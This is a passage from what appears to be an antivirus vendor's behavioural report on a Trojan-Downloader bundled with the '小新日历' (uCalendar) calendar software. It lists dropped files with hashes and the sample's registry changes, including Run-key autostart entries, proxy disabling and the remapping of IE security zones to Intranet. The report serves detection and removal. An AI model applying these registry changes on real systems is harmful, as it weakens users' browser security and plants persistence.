%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\core[2].php (751 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@baidu[2].txt (393 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@update.xiaoxinrili[2].txt (2899 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\stat[2].php (1097 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@cnzz.mmstat[1].txt (203 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\tclock.ini (184 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\FMTFilterinset[1].txt (108 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@7day.xiaoxinrili[1].txt (412 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@baidu[1].txt (196 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\update[1].txt (34 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\Version[1].txt (1 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@7day.xiaoxinrili[2].txt (206 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\data\Install.ini (22 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\Install[1].txt (34 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\tj[1].htm (552 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (11856 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\PopBoxBig[1].txt (11 bytes)

The Trojan-Downloader deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\md5[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@7day.xiaoxinrili[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@baidu[1].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\FMTFilterinset[1].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\htmlinset1[1].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\Version[1].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\PopBoxSmall[1].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\Install[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@update.xiaoxinrili[2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@7day.xiaoxinrili[2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@update.xiaoxinrili[1].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\update.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\PopBoxBig[1].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\update[1].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\uCalhtml[1].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\FMTFilterinset[1].txt (0 bytes)

Registry activity

The process attrib.exe:1168 makes changes in the system registry.


The Trojan-Downloader creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A4 DB 8B 12 66 3B 4D 33 95 DE ED CD 46 BE 3F FB"

The process attrib.exe:1520 makes changes in the system registry.


The Trojan-Downloader creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1A 3A 42 A7 98 7C 2C 0D 03 4B 55 72 B4 FF 7E D2"

The process %original file name%.exe:2040 makes changes in the system registry.


The Trojan-Downloader creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A2 89 95 9B 57 C9 6B C2 15 31 91 49 C9 D6 CE 8D"

The process riliquicken.exe:408 makes changes in the system registry.


The Trojan-Downloader creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1F 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "CB CF F8 7B EE 10 97 81 09 CD AE 07 4A 91 EC 3D"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan-Downloader modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan-Downloader modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan-Downloader modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan-Downloader deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process 6acad04bb03501dc920778ed12ba6d63.tmp:560 makes changes in the system registry.


The Trojan-Downloader creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{39E75F67-A843-44A0-B22E-8A4052ACC746}_is1]
"NoRepair" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{39E75F67-A843-44A0-B22E-8A4052ACC746}_is1]
"Inno Setup: Icon Group" = "小新日历"
"Publisher" = "小新日历"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{39E75F67-A843-44A0-B22E-8A4052ACC746}_is1]
"InstallDate" = "20150114"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{39E75F67-A843-44A0-B22E-8A4052ACC746}_is1]
"Inno Setup: User" = "%CurrentUserName%"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{39E75F67-A843-44A0-B22E-8A4052ACC746}_is1]
"URLUpdateInfo" = "www.xiaoxinrili.com"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{39E75F67-A843-44A0-B22E-8A4052ACC746}_is1]
"Comments" = "小新日历最专业日历应用平台"
"Inno Setup: Setup Version" = "5.5.5 (u)"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012015011420150115]
"CachePath" = "%USERPROFILE%\Local Settings\History\History.IE5\MSHist012015011420150115\"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{39E75F67-A843-44A0-B22E-8A4052ACC746}_is1]
"NoModify" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{39E75F67-A843-44A0-B22E-8A4052ACC746}_is1]
"UninstallString" = "%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\unins000.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012015011420150115]
"CacheRepair" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{39E75F67-A843-44A0-B22E-8A4052ACC746}_is1]
"MinorVersion" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{39E75F67-A843-44A0-B22E-8A4052ACC746}_is1]
"Inno Setup: Language" = "chinesesimp"
"DisplayIcon" = "%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\uCalendar.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{39E75F67-A843-44A0-B22E-8A4052ACC746}_is1]
"MajorVersion" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012015011420150115]
"CacheOptions" = "11"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{39E75F67-A843-44A0-B22E-8A4052ACC746}_is1]
"Inno Setup: App Path" = "%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "45 F4 0B AA 1C 84 BC 31 25 87 90 2D AC 0D 24 63"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{39E75F67-A843-44A0-B22E-8A4052ACC746}_is1]
"HelpLink" = "www.xiaoxinrili.com"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{39E75F67-A843-44A0-B22E-8A4052ACC746}_is1]
"URLInfoAbout" = "www.xiaoxinrili.com"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{39E75F67-A843-44A0-B22E-8A4052ACC746}_is1]
"DisplayName" = "小新日历 4.0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{39E75F67-A843-44A0-B22E-8A4052ACC746}_is1]
"QuietUninstallString" = "%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\unins000.exe /SILENT"

[HKCU\Software\xiaoxinrili]
"Path" = "c:\%original file name%.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012015011420150115]
"CacheLimit" = "8192"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012015011420150115]
"CachePrefix" = ":2015011420150115:"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{39E75F67-A843-44A0-B22E-8A4052ACC746}_is1]
"Contact" = "www.xiaoxinrili.com"
"InstallLocation" = "%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\"
"DisplayVersion" = "4.0"

The Trojan-Downloader modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan-Downloader modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

To automatically run itself each time Windows is booted, the Trojan-Downloader adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"riliquicken" = "%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\riliquicken.exe apprun"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan-Downloader modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

To automatically run itself each time Windows is booted, the Trojan-Downloader adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"riliRun" = "%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\uCalendar.exe -run"

The Trojan-Downloader deletes the following registry key(s):

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014041520140416]

The Trojan-Downloader deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process uCalendar.exe:1840 makes changes in the system registry.


The Trojan-Downloader creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar]
"riliquicken.exe" = "小新日历加速程序"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1E 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "23 5F 4E 19 04 09 8C 48 C3 6D AC CA D8 F0 5E AA"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan-Downloader modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan-Downloader modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan-Downloader modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

To automatically run itself each time Windows is booted, the Trojan-Downloader adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"riliRun" = "%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\uCalendar.exe -run"

The Trojan-Downloader deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

Dropped PE files

MD5 File path
e6c684ccc9c4197511fc63a9fce99e6dc:\Documents and Settings\"%CurrentUserName%"\Application Data\WDJConnEngine\2.69.0.5490\DriverInstallerX64.exe
1c9b446e7bb1688408b00cbb1427654ac:\Documents and Settings\"%CurrentUserName%"\Application Data\WDJConnEngine\2.69.0.5490\DriverInstallerX86.exe
3af3015a20b946d5a517bcb759704adbc:\Documents and Settings\"%CurrentUserName%"\Application Data\WDJConnEngine\2.69.0.5490\WDJDriverInstaller.exe
47889977579454b72714878b9c422e53c:\Documents and Settings\"%CurrentUserName%"\Application Data\WDJConnEngine\2.69.0.5490\adb_dev.dll
1e4985656fddb10f1538284d43a0a515c:\Documents and Settings\"%CurrentUserName%"\Application Data\WDJConnEngine\2.69.0.5490\libcurl.dll
6d0f9f92c799356c14a104070a36fd4ac:\Documents and Settings\"%CurrentUserName%"\Application Data\WDJConnEngine\2.69.0.5490\libeay32.dll
1658dc894eb4174e9c3f69ffc5dba5fbc:\Documents and Settings\"%CurrentUserName%"\Application Data\WDJConnEngine\2.69.0.5490\ssleay32.dll
ee51801b1fa295a7e16dc6b75937e299c:\Documents and Settings\"%CurrentUserName%"\Application Data\WDJConnEngine\2.69.0.5490\wdj_connection.dll
e9154ab5eacc68f37241d902949002e5c:\Documents and Settings\"%CurrentUserName%"\Application Data\WDJConnEngine\2.69.0.5490\wdjconx64.exe
b1b3323ae79de68dc20114cf190e128bc:\Documents and Settings\"%CurrentUserName%"\Application Data\WDJConnEngine\2.69.0.5490\wdjconx86.exe
9a3f1e0e960edc18a9e1b7327c45193ac:\Documents and Settings\"%CurrentUserName%"\Local Settings\Application Data\uCalendar\DesktopCalendar.dll
a56f6ae4b2bac4d224485f9387a4404bc:\Documents and Settings\"%CurrentUserName%"\Local Settings\Application Data\uCalendar\Replace.dll
2461c65c1a87ff4edb70600d05d46015c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Application Data\uCalendar\Replace64.dll
f07e819ba2e46a897cfabf816d7557b2c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Application Data\uCalendar\UninsFiles\CallbackCtrl.dll
5841c3c749ff25672f41b1a9390577d5c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Application Data\uCalendar\UninsFiles\ItDownload_wex.dll
1094c2460f1757666259fb054ac4e17ec:\Documents and Settings\"%CurrentUserName%"\Local Settings\Application Data\uCalendar\UninsFiles\WListViewEx.dll
500c424b869029816b2bfaf1e219b918c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Application Data\uCalendar\UninsFiles\WSysInfo.dll
0177746573eed407f8dca8a9e441aa49c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Application Data\uCalendar\UninsFiles\botva2.dll
d0372bedb70710aeff382818ad683f54c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Application Data\uCalendar\UninsFiles\webctrl.dll
2b3abef5bc1c547656c6ac6bfc1c5517c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Application Data\uCalendar\riliquicken.exe
9b21f129e74ea0507bfbb48c05db8f34c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Application Data\uCalendar\riliser.exe
496f899db2b789863e38d6e433f12987c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Application Data\uCalendar\uCalExternal.exe
1f5083874528f2bf4e8b1f075214c827c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Application Data\uCalendar\uCalHtml.exe
deb160af36bb91551be77789fa1743c0c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Application Data\uCalendar\uCalendar.exe
e025ac5fba63f331f27418e681405f70c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Application Data\uCalendar\ui_d.dll
adb0f9096aade0d914d8d6e33d69f886c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Application Data\uCalendar\unins000.exe
5f0218693884a23493c4d700684c9076c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Application Data\uCalendar\update.exe
31ebf7ed3fe2459cadd9c72544dce8a9c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Application Data\uCalendar\wdj_connection_wrapper.dll
5f0218693884a23493c4d700684c9076c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\tmp[1].exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

Removals

Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.

Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    attrib.exe:1168
    attrib.exe:1520
